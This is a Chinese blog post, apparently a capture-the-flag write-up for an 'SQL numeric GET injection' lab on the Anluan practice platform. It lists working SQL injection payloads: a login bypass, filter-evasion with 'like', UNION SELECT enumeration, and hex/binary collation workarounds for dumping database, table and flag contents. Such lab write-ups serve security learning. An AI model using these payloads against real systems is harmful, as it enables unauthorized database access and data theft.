安鸾渗透实战平台|SQL数字型GET注入02

最新推荐文章于 2022-07-21 13:23:17 发布
最新推荐文章于 2022-07-21 13:23:17 发布
阅读量1.4k 收藏 2
点赞数 1
分类专栏: 渗透测试学习 信息安全 Web安全 文章标签: sql web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m_de_g/article/details/121705420
版权

安鸾渗透实战平台|SQL数字型GET注入02

一、渗透靶场地址

http://whalwl.work:8034/

二、渗透实战

1.开始以为渗透后台,避免采坑

admin' or 1=1 #
123

在这里插入图片描述
直接就进入后台啦
在这里插入图片描述
2.实战开始,在搜索中输入1',报错

1'

在这里插入图片描述

在这里插入图片描述
3.当我们在后面加个#时,正常回显

1'#

在这里插入图片描述
4.判断orand,空格等号是否被过滤

1' or 1=1#

在这里插入图片描述

1' and 1=1#

在这里插入图片描述
根据报错信息,发现过滤了等号,使用like绕过

1' or 1 like 1#

在这里插入图片描述

1' and 1 like 1#

在这里插入图片描述
6.发现or,and,空格没有被绕过,接下来判断列

1' order by 1,2,3,4#

在这里插入图片描述
7.经过大量的测试,发现14列,遇到列比较多的情况时,使用二分法,比较快。(二分法:猜测有50列,使用25进行测)

1' order by 14,15#

在这里插入图片描述
8.接下来,判断显位点

-1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14#

在这里插入图片描述
9.通过回显可以判断出,显位点是3,9这个两个位置

-1' union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14#

可以看到版本号的值
在这里插入图片描述

10.爆破数据库

-1' union select 1,2,3,4,5,6, 7,8,group_concat(schema_name) from information_schema.schemata,10,11,12,13,14#

报错,觉得长度被截断,不能执行SQL注入
在这里插入图片描述
前面不是有两个注入点,那我们就将这条注入语句进行拆分

-1' union select 1,2,group_concat(schema_name),4,5,6, 7,8,from information_schema.schemata,10,11,12,13,14#

依然报错
在这里插入图片描述

上面的方法测试啦,也不行,就尝试注入点3和末尾拼接语句

-1' union select 1,2,group_concat(schema_name),4,5,6, 7,8,9,10,11,12,13,14 from information_schema.schemata#

在这里插入图片描述
遇到了新的报错Illegal mix of collations for operation 'UNION',它的意思是指操作联合的非法排序规则
在这里插入图片描述

解决办法一:
使用十六进制的方式读取

-1' union select 1,2,group_concat(hex(schema_name)),4,5,6, 7,8,9,10,11,12,13,14 from information_schema.schemata#

在这里插入图片描述
然后利用十六进制转字符串,就可以得到数据库
解密网站:http://tool.haooyou.com/code?group=convert&type=hexToStr&charset=UTF-8
在这里插入图片描述

解决办法二:
使用binary方式解决字符集的问题

-1' union select 1,2,binary(group_concat(schema_name)),4,5,6, 7,8,9,10,11,12,13,14 from information_schema.schemata#

在这里插入图片描述
使用binary的方式,直接的到数据库的名称,成功爆破数据库

information_schema,cms,mysql,performance_schema

11.爆表

-1' union select 1,2,binary(group_concat(table_name)),4,5,6, 7,8,9,10,11,12,13,14 from information_schema.tables where table_schema like 'cms'#

在这里插入图片描述
可以看到有个表名为this_is_flag
12.爆字段名

-1' union select 1,2,binary(group_concat(column_name)),4,5,6, 7,8,9,10,11,12,13,14 from information_schema.columns where table_schema like 'cms' and table_name like 'this_is_flag'#

在这里插入图片描述
得到两个字段名id,flag
13.爆破字段的内容

-1' union select 1,2,binary(group_concat(flag)),4,5,6, 7,8,9,10,11,12,13,14 from this_is_flag#

在这里插入图片描述
成功得到flag

三、知识点总结

1.本道题目比较新颖,在使用SQL注入的过程中,第一次遇到片接的情况,并且执行sql语句使用的是注入位置是注入点 + 字段后的内容

2.binary函数解决字符集的问题

四、参考链接

https://blog.csdn.net/aa18390583207/article/details/103378175

山川绿水
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试小菜鸡开课了-手工SQL注入之GET型
qq_53238442的博客
10-19 1975
GET型SQL注入的最大特点:它的参数内容会显示在请求行,如下图???? pikachu靶场: DVWA靶场: 手工注入MysqlGET型有回显的一般步骤: 判断是否存在注入注入类型: 猜测字段数: 查看输出点: 查看数据库名称及版本: 查看数据库中存在的表: 查看表中有哪些字段: 查看对应字段内容: 总结: 手工注入MysqlGET型有回显的一般步骤: 判断是否存在注入注入类型: 判断是否存在注入 1、通过在参数后面加一个单引号‘,如果页面出错,则存在SQL注入
SQL数字型GET注入02
海宝最美的博客
12-03 684
SQL数字型GET注入02 靶机地址:http://whalwl.site:8034/ 【2020年8月前有效】 话不多说,打开网址,看到有个交互式的搜索框,直接干 输入1,没毛病 输入1’ ,报错 查看错误提示,多了一个单引号’,用#注释,没毛病 1' order by 14 # //查看字段数,即列数【用二分法一个个尝试,发现order by 15时报错,14刚...
安鸾渗透实战平台|SQL数字型注入详细教程
qq_67262179的博客
05-06 1430
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录@[TOC](文章目录) 安鸾渗透实战平台|SQL数字型注入详细教程前言一、Mysql默认的information库基本1.schemata表内容2.tables表内容3.columns表内容二、渗透靶场地址三、mysql渗透步骤1.进入靶场,查看页面基本信息2.判断是否存在注入3.判断是否存在 符号过滤4.判断数据库字段列名数量5.使用联合查询判断显位点6.基本信息收集7.查询指定数据(cms)库下所有的表名8.查询指定表明下的.
安鸾渗透实战平台-sql注入
weixin_48421613的博客
01-04 3189
sql注入安鸾渗透实战平台是一个在线的靶场平台,需要通过一些列手段找到flag提交 文章目录sql注入SQL字符型注入(1-2)一、需识别mysql默认的information库二、内部结构1.schemata表内容2.tables表内容3.columns表内容4.解题思路SQL搜索型注入总结 SQL字符型注入(1-2) 开始忘记截图了,只好给大家直接写一下payload了 提示:仅适合参考 一、需识别mysql默认的information库 mysql 5.0版本以上会有一个默认的infor
安鸾渗透实战平台-SQL字符型注入
qxx5203的博客
07-21 494
漏洞URLhttp//47.103.94.1918005//bug/sql_injection/sql_string.php?title=1&submit=submit。数据库列的信息id,,不是我们需要的内容。查找flag表下的列。
sql注入数字型注入
08-02
SQL 注入数字型注入 SQL 注入数字型注入是一种常见的 Web 应用安全漏洞,攻击者可以通过构造恶意输入来inject恶意 SQL 语句,访问或修改数据库中的敏感信息。本文将详细介绍数字型注入的概念、原理、检测方法和...
sql注入 pikachu post数字型注入
08-12
SQL 注入 Pikachu Post 数字型注入 SQL 注入是一种常见的 Web 应用安全漏洞,攻击者可以通过在输入字段中注入恶意的 SQL 语句来获取或修改敏感数据。在本文中,我们将探讨一种新的 Post 数字型注入方法,即使用 ...
SQL注入绕过实战案例
08-31
我们将基于sqli-labs-master靶场进行学习,这是一个专门用于SQL注入攻防演练的平台SQL注入SQL Injection)是攻击者在Web应用的输入参数中插入恶意SQL代码,从而控制或操纵后台数据库服务器的一种技术。这种...
sql注入教程.sql注入实战
11-09
sql注入详细教程 寻找存在sql注入的网址 探测过滤 tamper 得到shell
35-35.渗透测试SQL注入SQL注入防御
最新发布
05-10
35-35.渗透测试SQL注入SQL注入防御
linux mysql udf 提权
ddr12231的博客
05-09 680
连接远程数据库 查看插件库路径 show variables like '%plugin%'; 写入udf库到插件目录: select unhex('7F454C4602010100000000000000000003003E0001000000800A000000000000400000000000000058180000000000000000000...
安鸾靶场 sql注入--SQL数字型GET注入01
s666789s的博客
04-06 569
1.SQL数字型GET注入01 (1)输入1’报错,输入-1返回正常,构造payload (2)判断显示位 -1 order by 3# -1 union select 1,2,3# (3)爆库:-1 union select 1,database(),3# (4)爆表:-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘dwvs’# (5)爆列:-1 union se
安鸾靶场 宽字符注入02 靶场练习 详细过程及解决问题笔记
AAAAAAAAAAAA66的博客
02-06 3334
题目 网站URL ECSHOP演示站 - Powered by ECShop 目录 笔记 过程 进入sql注入页面 问题 判断闭合符 sql注入下的模糊查询 right 语法爆字段值 笔记 对现在我来说难度其实不大,但题目考察的一些细节要求比较高。 首先把我遇到的问题 一 一 列出。(在下面解题的过程会一 一 解决) 题目虽然是叫宽字符注入,但实际考察的是报错注入 (挂羊头卖狗肉) 这个网站很大,注入点很难找(我也是看一位师傅的write up) 自己没有...
安鸾渗透实战平台|宽字符注入
m_de_g的博客
12-17 2859
安鸾渗透实战平台|宽字符注入 一、渗透靶场地址 http://www.whalwl.work:8011 二、渗透实战 1.先使用1'进行测试,发现被斜杆转义 2.根据题目提示,直接上手宽字节注入,可以成功 ?id=1%df'--+ 3.测试or,and,==是否被过滤 ?id=1%df' or 1=1--+ 4.判断列 ?id=1%df' order by 1,2,3,4,5,6--+ 5.发现有5列,判断注入点 ?id=0%df' union select 1,2,3,4,5--+ 6.
SQL注入2(报错型注入
嚴 帅的博客
04-25 738
SQL注入(一)https://blog.csdn.net/weixin_43997530/article/details/105627979 报错型SQL注入 我们先介绍一下报错型SQL注入,报错型sql注入sql注入(一)的前三步是一致的,但没有数据的回显位,也就是说即使构造语句成功我们也没有办法看到数据的显示。但是如果sql语句出现错误则可以显示在页面上,我们可以利用这点来构造报错显示...
sql注入简要说明GET等方法的区别
qq_44881113的博客
08-08 486
常见的提交方式:GET ,POST,REQUEST 下面是演示脚本 g代表GET方法的参数 p代表POST方法的参数 c代表COOKIE的参数 r代表REQUEST的参数 s代表SERVER的参数 <?php $get = $_GET['g'];//接受参数名g的值并赋值给变量get echo $get; //输出变量名g的数据 $post = $_POST['p']; //接受参数名p的值并赋值给变量post echo $post ;//输出变量post $c = $_COOKIE['c
SQL注入基础样例1
qq_49283465的博客
05-02 413
其次我们尝试通过字符转义、传入大数id=50000000等各种方式来使其报错—此处表示你已经过了waf(即使你不会),我们观察他的闭合方式,诱导语句闭合并使用- -+把后面语句注释掉。小知识:我们要知道SQL语句的闭合方式:无符号闭合、单引号—‘’、双引号—“”、单引号与括号联动—‘)、双引号与括号联动—“)、单引号括号双引号—‘)“、以及搜索语句中—‘%’闭合。攻击方式:报错注入、union联合注入、布尔盲注、时间盲注、http头注入、宽字节注入(中国网站)、文件注入、DNS注入等。
靶机练习:获取外网getshell进行内网渗透测试
weixin_45906324的博客
11-21 1157
实验靶场联系笔记 文章目录实验靶场联系笔记搭建环境实验工具实验要求实验流程 搭建环境 vmware导入两台靶场并开机,靶机下载地址 https://pan.baidu.com/s/1xd8MdGwqZqErtvu0QO5d5A 提取码 xbb5 然后配置物理机网卡的vmnet8ip 为100网段,192.168.100.1 实验工具 VMware® Workstation 15 Pro 版本:15...
GET、POST、表单提交登陆、URL登陆
qq_39277571的博客
11-24 9832
问题:在一次面试中,面试官看了我的项目后提出了一个问题,我的项目中登陆人员的角色有两种,一个是学生一个是老师,他说如果我知道了老师登陆表单所提交到的地址,那么我直接在URL中输入这个地址然后在后面按照GET方式请求那样加上我们自己的账号和密码(学生用户),那我们是不是能进入到老师的页面了,在业务中老师和学生的页面肯定是不同的,这种方式就实现了由学生账号进入到了老师的页面。当时他说的也没有这么清楚...
安鸾sql宽字符02
07-28
抱歉,我无法回答关于安鸾SQL宽字符02的问题。 #### 引用[.reference_title] - *1* [安鸾SQL系列之数字字符串](https://blog.csdn.net/weixin_46318141/article/details/123917863)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [安鸾靶场 宽字符注入02 靶场练习 详细过程及解决问题笔记](https://blog.csdn.net/AAAAAAAAAAAA66/article/details/122800595)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值